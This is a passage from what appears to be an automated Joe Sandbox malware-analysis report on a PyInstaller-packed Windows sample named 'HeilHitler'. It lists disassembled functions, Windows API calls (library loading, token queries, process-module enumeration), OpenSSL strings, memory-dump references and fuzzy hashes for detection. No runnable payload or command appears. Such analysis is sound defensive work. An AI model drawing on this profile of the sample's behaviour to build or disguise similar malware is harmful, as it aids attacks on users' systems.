                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Fiber$Switch$CreateDelete
                                                                                                                                                                                                                                            • String ID: *$..\s\crypto\async\async.c
                                                                                                                                                                                                                                            • API String ID: 2050058302-1471988776
                                                                                                                                                                                                                                            • Opcode ID: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
                                                                                                                                                                                                                                            • Instruction ID: 748cdb895e4d6e748d65d407dec6bfcbe0e06a4e5f2a74dfa107893dab95548c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30A16C32B0AA4385EB25DF15E460A7963A0EF48BC4F488431DAAD4B7E9EF3DE545D700
                                                                                                                                                                                                                                            Function 00007FF633D6DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD4D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD5B
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD85
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDF3
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDFF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                            • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction ID: 1018d420bc4576bb4e78e3352b4c7e5d447be61324c602785fa081507e9a0f08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31C121B1EB02D1EE11AB82A4026B53394FF48BA4F994735DD3DAB389EF3CE4449710
                                                                                                                                                                                                                                            Function 00007FF633D62A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF633D6351A,?,00000000,00007FF633D63F1B), ref: 00007FF633D62AA0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                            • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                            • Instruction ID: 5e051762cfbcc9d9c02d9a40582793537229a18107c4dca1f2d83445d9370648
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F21A33261978182E7209B91F8427E67394FB88784F800236FE9CA3759DF7CD1459740
                                                                                                                                                                                                                                            Function 00007FF633D68570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                            • Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                                                                                                                                                                                                            • Instruction ID: 85ca96772ff03f063ac1d8247f753327b3eae382b12b32df1e19e35e9204c46f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4216031A0C64642EB108BD5B54523AB3A0FF857A1F901335EABD97BE5DE7CE4459B00
                                                                                                                                                                                                                                            Function 00007FF633D7B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                            • Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                            • Instruction ID: 86d6940a3b2219007d66e191e412a291f70027244548114bd368ba9229ea2f96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B215B20F0D24281FA686FE19A5323952525F447B0F144734ED3EFBBD6DE2CB455A300
                                                                                                                                                                                                                                            Function 00007FF633D87D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                            • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                            • Instruction ID: af53bc2dcb930963b7421398c021bcd4b1365de1eeb1f8282b70542f2ad61348
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711B621B18B4286E7508B92F85632963A0FB88FE4F040334EA6DDB7A4DF3CE9148740
                                                                                                                                                                                                                                            Function 00007FF633D68ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68EFD
                                                                                                                                                                                                                                            • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68F5A
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68FE5
                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69044
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69055
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D6906A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3462794448-0
                                                                                                                                                                                                                                            • Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                                                                                                                                                                                                            • Instruction ID: 2cd8b1c69494db67d0b1a953af33810459aa8d9b5b5905be50cc7c462e16ab18
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2141B961B19A8281EB309B91A5422BAB394FF85BC4F841235DF6EE7789DF3CE511D700
                                                                                                                                                                                                                                            Function 00007FF633D690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetCurrentProcess.KERNEL32 ref: 00007FF633D68590
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: OpenProcessToken.ADVAPI32 ref: 00007FF633D685A3
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetTokenInformation.ADVAPI32 ref: 00007FF633D685C8
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetLastError.KERNEL32 ref: 00007FF633D685D2
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: GetTokenInformation.ADVAPI32 ref: 00007FF633D68612
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF633D6862E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68570: CloseHandle.KERNEL32 ref: 00007FF633D68646
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D6916C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF633D63C55), ref: 00007FF633D69175
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                            • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                            • Instruction ID: 52e6a2a20fb17ffffbb22bd5cc981b543d1c9b245fb98ce262a9502fd989064b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF213231A0874281F6109B90E9162FA7261FF84780F945236EA5EE77D6DF3CE945E740
                                                                                                                                                                                                                                            Function 00007FF633D7B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B2D7
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B30D
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B33A
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B34B
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B35C
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B377
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                            • Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                            • Instruction ID: 187532b38a27bdcbbcd2acae768bcb6fc113820c00d8ea0740a003fdd47af6c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC114F20F0C64282FA686FA1965323D62569F45BB0F544734E93EFB7E6DE6CF4916300
                                                                                                                                                                                                                                            Function 00007FFDFAE9A3B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007A3440ErrorLast
                                                                                                                                                                                                                                            • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                                                                                                                                                                                                            • API String ID: 848807496-4291904164
                                                                                                                                                                                                                                            • Opcode ID: 7943f625b7d20c5b2a256d95b4f9ffa19be6ef3d4345ba9e1828761067b97a59
                                                                                                                                                                                                                                            • Instruction ID: dccf1b334737eb92ba4a9ac5fa87493ceea3a452a62c8a5f12c3231f5088c01a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7943f625b7d20c5b2a256d95b4f9ffa19be6ef3d4345ba9e1828761067b97a59
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9716261B1C78285FB58BB1194B0BB93351AF85788F4101B5EE5F47BDEDE3EE9068600
                                                                                                                                                                                                                                            Function 00007FF633D62910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                            • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction ID: afd009434f3403cab6d77ae120dfd1b90e560974ea6bd378f7d987ca72e5539d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29310872B1968152E7209BA5A8426E77395BF887D8F800232FE9DE3755EF3CD146D700
                                                                                                                                                                                                                                            Function 00007FF633D62390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
